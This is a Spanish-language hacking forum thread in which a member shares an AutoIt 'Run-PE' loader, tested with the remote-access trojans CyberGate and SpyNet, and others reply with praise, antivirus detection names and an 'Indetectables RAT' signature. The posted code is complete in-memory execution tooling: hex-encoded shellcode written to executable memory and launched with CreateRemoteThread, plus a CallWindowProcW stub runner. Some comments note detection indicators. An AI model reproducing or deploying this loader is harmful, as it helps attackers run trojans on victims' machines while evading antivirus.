Buenas compadres ,

Hace tiempo que no me conecto por cosas del trabajo, que por estas fechas me toman todo el tiempo, pero no estoy muerto.... Andaré inactivo algún tiempo más, pero pronto volveré....

Los dejo a disfrutar ....

Saludos



# ================================================
# Run-PE v2.0  [ Fasm ShellCode ]
# Run Exe Buffer From Memory ( Not Remote )
# Author : M3
# Thanks : DeadlyVermilion [ ShellCode ]
# Pirate-Inc (DZ)
# Pink
# Tested on XP SP3 | Win7 32 With Cybergate | SpyNet
# Usage : sRunFromMemory(SomeBinaryBuffer)
# Enjoy !!!
# ================================================



; Loads the PE image held in $sBinaryBuffer into the current process and
; transfers control to it through an embedded, hex-encoded stub (the
; "Run-PE" stage named in the file header).
;
; Parameters:
;   $sBinaryBuffer - raw bytes of the executable to run; written verbatim
;                    into member 1 of the DllStruct built below.
; Returns: nothing. Every failure path calls Exit, which terminates the
;   whole script rather than returning to the caller.
;
; Analyst notes (observable behaviour, taken only from the calls below):
;   - VirtualAlloc with 4096 (MEM_COMMIT) and 64 (PAGE_EXECUTE_READWRITE):
;     a private RWX region is committed.
;   - OpenProcess / WriteProcessMemory / CreateRemoteThread are all issued
;     against @AutoItPID, i.e. the process injects into itself.
;   - An 18-part hex blob is concatenated and executed from that region; its
;     behaviour is not established by this listing and would need a
;     disassembler to confirm.
;   Those three traits are the usual detection points for loaders of this
;   shape (RWX commit, self-directed remote-thread APIs, large hex constants
;   written to executable memory).
Func sRunFromMemory($sBinaryBuffer)

Local $sProcess , $sRemote_Tread , $sObject , $sMemoryStruct , $sStructPointer , $sStructShellCode , _
$sStructSize ,$sExeBuffer ,$sShellCodeBuffer,$sAsmBuffer ,$sLenExePath ,$sShellCode[19], $sShellBuffer  , _
$sAsmCode , $sAsmLen , $sExeAlocateBuffer , $sMemoryAsmStruct , $sAsmBufferDest , $sAsmMemoryData

Local Const $sKernel32 = "kernel32"

; Intended as an empty-buffer guard. Note it calls Exit, so an empty buffer
; ends the script, not just this function.
If Not $sBinaryBuffer <> "" Then

ConsoleWrite('Binary buffer not Exists , Choose an .exe File to Read First ...' )

Exit

EndIf

; Opaque machine code supplied as hex text in 18 slices (index 0 is unused).
; Nothing in this listing documents what it does; treat it as untrusted input
; to any analysis and disassemble before drawing conclusions.
$sShellCode[1] = '0X8BEC81C4A4FAFFFF8945FCE81B0200008985CCFDFFFFBBF20F56C68B95CCFDFFFFE819020000894'
$sShellCode[2] = '5F8BBA98B802D8B95CCFDFFFFE8060200008945F4BB853BAEDB8B95CCFDFFFFE8F30100008945F0BB'
$sShellCode[3] = '9335DF858B95CCFDFFFFE8E00100008945ECBB8DCBB65D8B95CCFDFFFFE8CD0100008945E8BB5313C'
$sShellCode[4] = '1788B95CCFDFFFFE8BA0100008945E4BB8ADBDFA58B95CCFDFFFFE8A70100008945E0BB2E0550C88B'
$sShellCode[5] = '95CCFDFFFFE8940100008945DCBB85A116A28B95CCFDFFFFE881010000E8060000006E74646C6C005'
$sShellCode[6] = 'F57FFD08985D0FDFFFFBB8BE3CD418BD0E8600100008945D8BB39230D2C8B95D0FDFFFFE84D010000'
$sShellCode[7] = '8945D468000200008D85D4FDFFFF506A00FF55F86A448D8588FDFFFF50FF55D4FF55F48BC88D8578F'
$sShellCode[8] = 'DFFFF508D8588FDFFFF506A006A006A046A006A006A00518D85D4FDFFFF50FF55F068CC0200008D85'
$sShellCode[9] = 'A4FAFFFF50FF55D4C785A4FAFFFF020001008D85A4FAFFFF50FFB57CFDFFFFFF55EC64A1300000008'
$sShellCode[10] = 'B400C8B40148B401050FFB578FDFFFFFF55D88B7DFC037F3C6A406800300000FF7750FF7734FFB57'
$sShellCode[11] = '8FDFFFFFF55E8898574FDFFFF6A00FF7754FF75FCFFB574FDFFFFFFB578FDFFFFFF55E48D4718898'
$sShellCode[12] = '570FDFFFF0FB74714018570FDFFFF33C033F633C9EB296BC628038570FDFFFF8B9D74FDFFFF03580'
$sShellCode[13] = 'C8B55FC0350146A00FF70105253FFB578FDFFFFFF55E446663B770672D18B8574FDFFFF034728898'
$sShellCode[14] = '554FBFFFF8D85A4FAFFFF50FFB57CFDFFFFFF55E0FFB57CFDFFFFFF55DCC9C364A1300000008B400'
$sShellCode[15] = 'C8B400C8B008B008B4018C3558BEC83C4F4528955FC8B4A3C03CA894DF48B497803CA894DF88B511'
$sShellCode[16] = '88B4920034DFC33FF8B310375FC33C051AC8BC803F8D3C785C075F5593BFB741083C1044A75E0BAC'
$sShellCode[17] = '258621B5A33C0C9C38B45FC8B4DF88B59188B492403C82BDAD1E303CB0FB7198B4DF88B491C03C8C'
$sShellCode[18] = '1E30203CB03015AC9C300'


; Join the 18 slices into one hex string.
For $i = 1 to 18

	$sShellBuffer &= $sShellCode[$i]

Next


$sLenExePath = StringLen($sBinaryBuffer)

; Two hex characters per byte.
$sLenShellCode = StringLen($sShellBuffer) / 2

; One contiguous layout: [PE bytes][shellcode bytes][15-byte stub].
; The "Boolean" element type is used here as a one-byte cell (AutoIt's
; BOOLEAN is a single byte - confirm against the DllStruct docs if it matters).
$sMemoryStruct = DllStructCreate ("Boolean BinaryBuffer[" & $sLenExePath & "];Boolean ShellCodeBuffer[" & $sLenShellCode - 1 & "];Boolean AsmCode[15]")

$sStructPointer = DllStructGetPtr ($sMemoryStruct , 1)

$sStructShellCode = DllStructGetPtr ($sMemoryStruct , 2)

$sStructSize = DllStructGetSize ($sMemoryStruct)

; 4096 = 0x1000 (MEM_COMMIT), 64 = 0x40 (PAGE_EXECUTE_READWRITE): the whole
; struct gets an RWX home. RWX private commits are a standard memory-scan
; heuristic.
$sExeAlocateBuffer = DllCall($sKernel32, "ptr", "VirtualAlloc", "ptr", 0, "dword_ptr", $sStructSize, "dword", 4096, "dword", 64)

If IsArray($sExeAlocateBuffer) Then

$sExeBuffer = $sExeAlocateBuffer[0]

Else

ConsoleWrite ('Unable to Allocate Virtual Memory')

Exit

EndIf

; Address the shellcode will have once the struct is copied into the region
; (offset of member 2 inside the layout above).
$sShellCodeBuffer = $sExeBuffer + $sLenExePath

; Builds the 15-byte stub that member 3 will hold. From the opcode bytes:
;   8D 05 imm32   lea eax, [imm32]   (exe buffer address)
;   8D 1D imm32   lea ebx, [imm32]   (shellcode address)
;   FF D3         call ebx
;   C3            ret
; Each address is emitted by reading 2-character slices of the pointer's
; string form from position 11 down to 3, which appears meant to produce
; little-endian byte order and relies on AutoIt rendering a ptr as "0x" plus
; eight hex digits - assumption, not verified from this listing.
$sAsmCode   = "0X8D05"

For $i = 11 To 3 Step -2

$sAsmCode  &= StringMid ($sExeBuffer , $i , 2)

Next

$sAsmCode  &= "8D1D"

For $i = 11 To 3 Step -2

$sAsmCode  &= StringMid ($sShellCodeBuffer , $i , 2)

Next

$sAsmCode  &= "FFD3C3"

; 32 hex characters including the "0X" prefix -> 16 - 1 = 15 bytes when both
; pointers contributed 8 hex digits; matches AsmCode[15] above.
$sAsmLen = StringLen($sAsmCode) / 2 - 1

$sMemoryAsmStruct = DllStructCreate("Boolean AsmCopyMemory[" & $sAsmLen & "]")

DllStructSetData($sMemoryAsmStruct, 1, $sAsmCode)

$sAsmBufferDest = DllStructGetPtr($sMemoryStruct, 3)

$sAsmMemoryData = DllStructGetPtr($sMemoryAsmStruct , 1)

; Copies the stub into member 3 by executing a byte stub of its own (see
; CopyMemory below) rather than with DllStructSetData.
CopyMemory($sAsmBufferDest, $sAsmMemoryData , $sAsmLen)

DllStructSetData ($sMemoryStruct, 1 ,$sBinaryBuffer)

DllStructSetData ($sMemoryStruct, 2 ,$sShellBuffer)

; 0x001F0FFF = PROCESS_ALL_ACCESS, opened on our own PID. Handle is stored
; as "int", so this is 32-bit-only code (consistent with the header's test
; targets).
$sProcess = DllCall($sKernel32, "int", "OpenProcess", "int", 0x001f0fff, "int", 0, "int", @AutoItPID)

If IsArray($sProcess) And Not @error Then

$sProcess = $sProcess[0]

; Copies the entire struct (PE + shellcode + stub) into the RWX region of
; this same process. The call's result is not checked.
DllCall($sKernel32, "int", "WriteProcessMemory", "int", $sProcess, "ptr", $sExeBuffer, "ptr", $sStructPointer, "int", $sStructSize, "int", 0)

; Address of member 3 inside the region: the thread entry point.
$sAsmBuffer = $sShellCodeBuffer + $sLenShellCode - 1

Else

ConsoleWrite('Unable to Open Process')

Exit

Endif

; Thread start address is the stub in RWX memory, in our own process.
; A remote-thread API aimed at the caller's own PID is a common behavioural
; signature for this technique.
$sRemote_Tread = DllCall($sKernel32, "int", "CreateRemoteThread", "int", $sProcess, "ptr", 0, "int", 0, "int", $sAsmBuffer, "ptr", 0, "int", 0, "int", 0)

if IsArray ($sRemote_Tread) And Not @error Then

$sRemote_Tread = $sRemote_Tread[0]

; Waits at most 100 ms for the thread (return value unused), closes the
; process handle, and releases the region with 0x8000 (MEM_RELEASE). The
; thread handle itself is never closed.
DllCall($sKernel32, "int", "WaitForSingleObject", "int", $sRemote_Tread, "int", 100)

DllCall($sKernel32, "int", "CloseHandle", "int", $sProcess)

DllCall($sKernel32, "bool", "VirtualFree", "ptr", $sExeBuffer, "dword_ptr", 0, "dword", 0X8000)

Else

ConsoleWrite ('Unable to Create Thread')

Exit

EndIf

EndFunc



; Copies $len bytes from $Source to $Des by executing a tiny byte stub
; through CallWindowProcW, which simply calls whatever address it is given
; as the "window procedure". Decoded from the opcode bytes, the stub is:
;   8B 7C 24 04   mov edi, [esp+4]    (hwnd   -> $Des)
;   8B 74 24 08   mov esi, [esp+8]    (msg    -> $Source)
;   31 C9         xor ecx, ecx
;   8B 4C 24 0C   mov ecx, [esp+0Ch]  (wParam -> $len)
;   F3 A4         rep movsb
;   C3            ret
;
; Parameters:
;   $Des    - destination pointer.
;   $Source - source pointer.
;   $len    - number of bytes to copy.
; Returns: nothing; $Ret holds CallWindowProcW's result but is never read.
; AutoIt variable names are case-insensitive, so $des/$source below refer to
; the parameters $Des/$Source.
;
; Analyst note: CallWindowProc used as an execution primitive for bytes held
; in a data struct is a well-known AutoIt loader idiom and a reliable
; behavioural indicator (a user32 callback whose target lies in heap memory).
Func CopyMemory($Des,$Source,$len)


local  $ASM = "0x8B7C24048B74240831C98B4C240CF3A4C300000000000000"

Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")


DllStructSetData($BufferASM, 1, $ASM)


Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
            "ptr", DllStructGetPtr($BufferASM), _
            "ptr", $des, _
            "ptr", $source, _
            "int", $len, _
            "int", 0)

EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
Buen trabajo, como siempre bro.

PD: Por cierto, igual no lo viste, ya hay categoría de AutoIt.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Muchas gracias compadres , un saludo tios , nos vemos

PD: Verdad, Scorpio, no me di cuenta de la zona de AutoIt.

Gracias compa
Indetectables RAT v.0.9.5

@Indetectables Team
